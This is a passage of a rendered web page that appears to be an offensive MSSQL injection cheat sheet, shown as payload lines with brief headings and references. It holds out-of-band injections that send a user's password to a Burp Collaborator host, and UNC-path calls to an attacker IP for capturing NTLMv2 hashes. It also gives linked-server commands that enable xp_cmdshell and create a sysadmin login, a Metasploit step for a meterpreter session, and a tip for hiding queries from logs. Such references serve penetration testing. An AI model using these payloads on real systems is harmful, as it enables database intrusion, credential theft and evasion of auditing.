<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a><span class="n">1</span> <span class="n">and</span> <span class="n">exists</span><span class="p">(</span><span class="nb">select </span><span class="p">*</span> <span class="n">from</span> <span class="n">fn_xe_file_target_read_file</span><span class="p">(</span><span class="s1">&#39;C:\*.xel&#39;</span><span class="p">,</span><span class="s1">&#39;\\&#39;</span><span class="k">%</span><span class="n">2b</span><span class="p">(</span><span class="nb">select </span><span class="n">pass</span> <span class="n">from</span> <span class="n">users</span> <span class="nb">where </span><span class="n">id</span><span class="p">=</span><span class="n">1</span><span class="p">)</span><span class="k">%</span><span class="n">2b</span><span class="s1">&#39;.xxxx.burpcollaborator.net\1.xem&#39;</span><span class="p">,</span><span class="n">null</span><span class="p">,</span><span class="n">null</span><span class="p">))</span>
<a id="__codelineno-20-3" name="__codelineno-20-3" href="#__codelineno-20-3"></a>
<a id="__codelineno-20-4" name="__codelineno-20-4" href="#__codelineno-20-4"></a><span class="c"># Permissions: Requires the CONTROL SERVER permission.</span>
<a id="__codelineno-20-5" name="__codelineno-20-5" href="#__codelineno-20-5"></a><span class="n">1</span> <span class="p">(</span><span class="nb">select </span><span class="n">1</span> <span class="nb">where </span><span class="n">exists</span><span class="p">(</span><span class="nb">select </span><span class="p">*</span> <span class="n">from</span> <span class="n">fn_get_audit_file</span><span class="p">(</span><span class="s1">&#39;\\&#39;</span><span class="k">%</span><span class="n">2b</span><span class="p">(</span><span class="nb">select </span><span class="n">pass</span> <span class="n">from</span> <span class="n">users</span> <span class="nb">where </span><span class="n">id</span><span class="p">=</span><span class="n">1</span><span class="p">)</span><span class="k">%</span><span class="n">2b</span><span class="s1">&#39;.xxxx.burpcollaborator.net\&#39;</span><span class="p">,</span><span class="k">default</span><span class="p">,</span><span class="k">default</span><span class="p">)))</span>
<a id="__codelineno-20-6" name="__codelineno-20-6" href="#__codelineno-20-6"></a><span class="n">1</span> <span class="n">and</span> <span class="n">exists</span><span class="p">(</span><span class="nb">select </span><span class="p">*</span> <span class="n">from</span> <span class="n">fn_trace_gettable</span><span class="p">(</span><span class="s1">&#39;\\&#39;</span><span class="k">%</span><span class="n">2b</span><span class="p">(</span><span class="nb">select </span><span class="n">pass</span> <span class="n">from</span> <span class="n">users</span> <span class="nb">where </span><span class="n">id</span><span class="p">=</span><span class="n">1</span><span class="p">)</span><span class="k">%</span><span class="n">2b</span><span class="s1">&#39;.xxxx.burpcollaborator.net\1.trc&#39;</span><span class="p">,</span><span class="k">default</span><span class="p">))</span>
</code></pre></div>
<h3 id="mssql-unc-path">MSSQL UNC Path</h3>
<p>MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the <code>xp_dirtree</code> function to list the files in our SMB share and grab the NTLMv2 hash.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-21-1" name="__codelineno-21-1" href="#__codelineno-21-1"></a><span class="mi">1</span><span class="s1">&#39;; use master; exec xp_dirtree &#39;</span><span class="err">\\</span><span class="mi">10</span><span class="p">.</span><span class="mi">10</span><span class="p">.</span><span class="mi">15</span><span class="p">.</span><span class="n">XX</span><span class="err">\</span><span class="k">SHARE</span><span class="err">&#39;</span><span class="p">;</span><span class="c1">-- </span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><a id="__codelineno-22-1" name="__codelineno-22-1" href="#__codelineno-22-1"></a><span class="n">xp_dirtree</span><span class="w"> </span><span class="s1">&#39;\\attackerip\file&#39;</span>
<a id="__codelineno-22-2" name="__codelineno-22-2" href="#__codelineno-22-2"></a><span class="n">xp_fileexist</span><span class="w"> </span><span class="s1">&#39;\\attackerip\file&#39;</span>
<a id="__codelineno-22-3" name="__codelineno-22-3" href="#__codelineno-22-3"></a><span class="n">BACKUP</span><span class="w"> </span><span class="n">LOG</span><span class="w"> </span><span class="p">[</span><span class="n">TESTING</span><span class="p">]</span><span class="w"> </span><span class="k">TO</span><span class="w"> </span><span class="n">DISK</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;\\attackerip\file&#39;</span>
<a id="__codelineno-22-4" name="__codelineno-22-4" href="#__codelineno-22-4"></a><span class="n">BACKUP</span><span class="w"> </span><span class="k">DATABASE</span><span class="w"> </span><span class="p">[</span><span class="n">TESTING</span><span class="p">]</span><span class="w"> </span><span class="k">TO</span><span class="w"> </span><span class="n">DISK</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;\\attackeri\file&#39;</span>
<a id="__codelineno-22-5" name="__codelineno-22-5" href="#__codelineno-22-5"></a><span class="n">RESTORE</span><span class="w"> </span><span class="n">LOG</span><span class="w"> </span><span class="p">[</span><span class="n">TESTING</span><span class="p">]</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DISK</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;\\attackerip\file&#39;</span>
<a id="__codelineno-22-6" name="__codelineno-22-6" href="#__codelineno-22-6"></a><span class="n">RESTORE</span><span class="w"> </span><span class="k">DATABASE</span><span class="w"> </span><span class="p">[</span><span class="n">TESTING</span><span class="p">]</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DISK</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;\\attackerip\file&#39;</span>
<a id="__codelineno-22-7" name="__codelineno-22-7" href="#__codelineno-22-7"></a><span class="n">RESTORE</span><span class="w"> </span><span class="n">HEADERONLY</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DISK</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;\\attackerip\file&#39;</span>
<a id="__codelineno-22-8" name="__codelineno-22-8" href="#__codelineno-22-8"></a><span class="n">RESTORE</span><span class="w"> </span><span class="n">FILELISTONLY</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DISK</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;\\attackerip\file&#39;</span>
<a id="__codelineno-22-9" name="__codelineno-22-9" href="#__codelineno-22-9"></a><span class="n">RESTORE</span><span class="w"> </span><span class="n">LABELONLY</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DISK</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;\\attackerip\file&#39;</span>
<a id="__codelineno-22-10" name="__codelineno-22-10" href="#__codelineno-22-10"></a><span class="n">RESTORE</span><span class="w"> </span><span class="n">REWINDONLY</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DISK</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;\\attackerip\file&#39;</span>
<a id="__codelineno-22-11" name="__codelineno-22-11" href="#__codelineno-22-11"></a><span class="n">RESTORE</span><span class="w"> </span><span class="n">VERIFYONLY</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">DISK</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;\\attackerip\file&#39;</span>
</code></pre></div>
<h2 id="mssql-make-user-dba-db-admin">MSSQL Make user DBA (DB admin)</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-23-1" name="__codelineno-23-1" href="#__codelineno-23-1"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">master</span><span class="p">.</span><span class="n">dbo</span><span class="p">.</span><span class="n">sp_addsrvrolemember</span><span class="w"> </span><span class="s1">&#39;user&#39;</span><span class="p">,</span><span class="w"> </span><span class="err">&#39;</span><span class="n">sysadmin</span><span class="p">;</span>
</code></pre></div>
<h2 id="mssql-trusted-links">MSSQL Trusted Links</h2>
<blockquote>
<p>The links between databases work even across forest trusts.</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-24-1" name="__codelineno-24-1" href="#__codelineno-24-1"></a><span class="n">msf</span><span class="p">&gt;</span> <span class="n">use</span> <span class="n">exploit</span><span class="p">/</span><span class="n">windows</span><span class="p">/</span><span class="n">mssql</span><span class="p">/</span><span class="n">mssql_linkcrawler</span>
<a id="__codelineno-24-2" name="__codelineno-24-2" href="#__codelineno-24-2"></a><span class="p">[</span><span class="n">msf</span><span class="p">&gt;</span> <span class="nb">set </span><span class="n">DEPLOY</span> <span class="n">true</span><span class="p">]</span> <span class="c">#Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio</span>
</code></pre></div>
<p>Manual exploitation</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-25-1" name="__codelineno-25-1" href="#__codelineno-25-1"></a><span class="c1">-- find link</span>
<a id="__codelineno-25-2" name="__codelineno-25-2" href="#__codelineno-25-2"></a><span class="k">select</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sysservers</span>
<a id="__codelineno-25-3" name="__codelineno-25-3" href="#__codelineno-25-3"></a>
<a id="__codelineno-25-4" name="__codelineno-25-4" href="#__codelineno-25-4"></a><span class="c1">-- execute query through the link</span>
<a id="__codelineno-25-5" name="__codelineno-25-5" href="#__codelineno-25-5"></a><span class="k">select</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">openquery</span><span class="p">(</span><span class="ss">&quot;dcorp-sql1&quot;</span><span class="p">,</span><span class="w"> </span><span class="s1">&#39;select * from master..sysservers&#39;</span><span class="p">)</span>
<a id="__codelineno-25-6" name="__codelineno-25-6" href="#__codelineno-25-6"></a><span class="k">select</span><span class="w"> </span><span class="k">version</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">openquery</span><span class="p">(</span><span class="ss">&quot;linkedserver&quot;</span><span class="p">,</span><span class="w"> </span><span class="s1">&#39;select @@version as version&#39;</span><span class="p">);</span>
<a id="__codelineno-25-7" name="__codelineno-25-7" href="#__codelineno-25-7"></a>
<a id="__codelineno-25-8" name="__codelineno-25-8" href="#__codelineno-25-8"></a><span class="c1">-- chain multiple openquery</span>
<a id="__codelineno-25-9" name="__codelineno-25-9" href="#__codelineno-25-9"></a><span class="k">select</span><span class="w"> </span><span class="k">version</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">openquery</span><span class="p">(</span><span class="ss">&quot;link1&quot;</span><span class="p">,</span><span class="s1">&#39;select version from openquery(&quot;link2&quot;,&quot;select @@version as version&quot;)&#39;</span><span class="p">)</span>
<a id="__codelineno-25-10" name="__codelineno-25-10" href="#__codelineno-25-10"></a>
<a id="__codelineno-25-11" name="__codelineno-25-11" href="#__codelineno-25-11"></a><span class="c1">-- execute shell commands</span>
<a id="__codelineno-25-12" name="__codelineno-25-12" href="#__codelineno-25-12"></a><span class="k">EXECUTE</span><span class="p">(</span><span class="s1">&#39;sp_configure &#39;&#39;xp_cmdshell&#39;&#39;,1;reconfigure;&#39;</span><span class="p">)</span><span class="w"> </span><span class="k">AT</span><span class="w"> </span><span class="n">LinkedServer</span>
<a id="__codelineno-25-13" name="__codelineno-25-13" href="#__codelineno-25-13"></a><span class="k">select</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">openquery</span><span class="p">(</span><span class="ss">&quot;linkedserver&quot;</span><span class="p">,</span><span class="s1">&#39;select 1;exec master..xp_cmdshell &quot;dir c:&quot;&#39;</span><span class="p">)</span>
<a id="__codelineno-25-14" name="__codelineno-25-14" href="#__codelineno-25-14"></a>
<a id="__codelineno-25-15" name="__codelineno-25-15" href="#__codelineno-25-15"></a><span class="c1">-- create user and give admin privileges</span>
<a id="__codelineno-25-16" name="__codelineno-25-16" href="#__codelineno-25-16"></a><span class="k">EXECUTE</span><span class="p">(</span><span class="s1">&#39;EXECUTE(&#39;&#39;CREATE LOGIN hacker WITH PASSWORD = &#39;&#39;&#39;&#39;P@ssword123.&#39;&#39;&#39;&#39; &#39;&#39;) AT &quot;DOMINIO\SERVER1&quot;&#39;</span><span class="p">)</span><span class="w"> </span><span class="k">AT</span><span class="w"> </span><span class="ss">&quot;DOMINIO\SERVER2&quot;</span>
<a id="__codelineno-25-17" name="__codelineno-25-17" href="#__codelineno-25-17"></a><span class="k">EXECUTE</span><span class="p">(</span><span class="s1">&#39;EXECUTE(&#39;&#39;sp_addsrvrolemember &#39;&#39;&#39;&#39;hacker&#39;&#39;&#39;&#39; , &#39;&#39;&#39;&#39;sysadmin&#39;&#39;&#39;&#39; &#39;&#39;) AT &quot;DOMINIO\SERVER1&quot;&#39;</span><span class="p">)</span><span class="w"> </span><span class="k">AT</span><span class="w"> </span><span class="ss">&quot;DOMINIO\SERVER2&quot;</span>
</code></pre></div>
<h2 id="list-permissions">List permissions</h2>
<p>Listing effective permissions of current user on the server.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-26-1" name="__codelineno-26-1" href="#__codelineno-26-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">fn_my_permissions</span><span class="p">(</span><span class="k">NULL</span><span class="p">,</span><span class="w"> </span><span class="s1">&#39;SERVER&#39;</span><span class="p">);</span><span class="w"> </span>
</code></pre></div>
<p>Listing effective permissions of current user on the database.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-27-1" name="__codelineno-27-1" href="#__codelineno-27-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">fn_my_permissions</span><span class="w"> </span><span class="p">(</span><span class="k">NULL</span><span class="p">,</span><span class="w"> </span><span class="s1">&#39;DATABASE&#39;</span><span class="p">);</span>
</code></pre></div>
<p>Listing effective permissions of current user on a view.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-28-1" name="__codelineno-28-1" href="#__codelineno-28-1"></a>SELECT * FROM fn_my_permissions(&#39;Sales.vIndividualCustomer&#39;, &#39;OBJECT&#39;) ORDER BY subentity_name, permission_name;
</code></pre></div>
<p>Check if current user is a member of the specified server role.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-29-1" name="__codelineno-29-1" href="#__codelineno-29-1"></a><span class="c1">-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin</span>
<a id="__codelineno-29-2" name="__codelineno-29-2" href="#__codelineno-29-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">is_srvrolemember</span><span class="p">(</span><span class="s1">&#39;sysadmin&#39;</span><span class="p">);</span>
</code></pre></div>
<h2 id="mssql-opsec">MSSQL OPSEC</h2>
<p>Use <code>SP_PASSWORD</code> in a query to hide from the logs like : <code>' AND 1=1--sp_password</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-30-1" name="__codelineno-30-1" href="#__codelineno-30-1"></a><span class="c1">-- &#39;sp_password&#39; was found in the text of this event.</span>
<a id="__codelineno-30-2" name="__codelineno-30-2" href="#__codelineno-30-2"></a><span class="c1">-- The text has been replaced with this comment for security reasons.</span>
</code></pre></div>
<h2 id="references">References</h2>
<ul>
<li><a href="http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet">Pentest Monkey - mssql-sql-injection-cheat-sheet</a></li>
<li><a href="https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf">Error Based - SQL Injection </a></li>
<li><a href="https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links">MSSQL Trusted Links - HackTricks.xyz</a></li>
<li><a href="https://blog.netspi.com/how-to-hack-database-links-in-sql-server/">SQL Server Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013</a></li>
<li><a href="https://github.com/NetSPI/DAFT">DAFT: Database Audit Framework &amp; Toolkit - NetSPI</a></li>
<li><a href="https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e">SQL Server UNC Path Injection Cheatsheet - nullbind</a></li>
<li><a href="https://www.exploit-db.com/papers/12975">Full MSSQL Injection PWNage - ZeQ3uL &amp;&amp; JabAv0C - 28 January 2009</a></li>
<li><a href="https://docs.microsoft.com/en-us/sql/relational-databases/system-functions/sys-fn-my-permissions-transact-sql?view=sql-server-ver15">Microsoft - sys.fn_my_permissions (Transact-SQL)</a></li>
<li><a href="https://docs.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver15">Microsoft - IS_SRVROLEMEMBER (Transact-SQL)</a></li>
<li><a href="https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/">AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice - Marc Olivier Bergeron - Jun 21, 2023</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1-2.1-2M12.5 7v5.2l4 2.4-1 1L11 13V7h1.5M11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2v1.8Z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">June 24, 2023</span>
</span>
</aside>
</article>
</div>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
<button type="button" class="md-top md-icon" data-md-component="top" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8v12Z"/></svg>
Back to top
</button>
</main>
<footer class="md-footer">
<div class="md-footer-meta md-typeset">
<div class="md-footer-meta__inner md-grid">
<div class="md-copyright">
Made with
<a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
Material for MkDocs
</a>
</div>
</div>
</div>
</footer>
</div>
<div class="md-dialog" data-md-component="dialog">
<div class="md-dialog__inner md-typeset"></div>
</div>
<script id="__config" type="application/json">{"base": "../..", "features": ["content.code.copy", "navigation.tracking", "navigation.top"], "search": "../../assets/javascripts/workers/search.b8dbb3d2.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
<script src="../../assets/javascripts/bundle.bd41221c.min.js"></script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink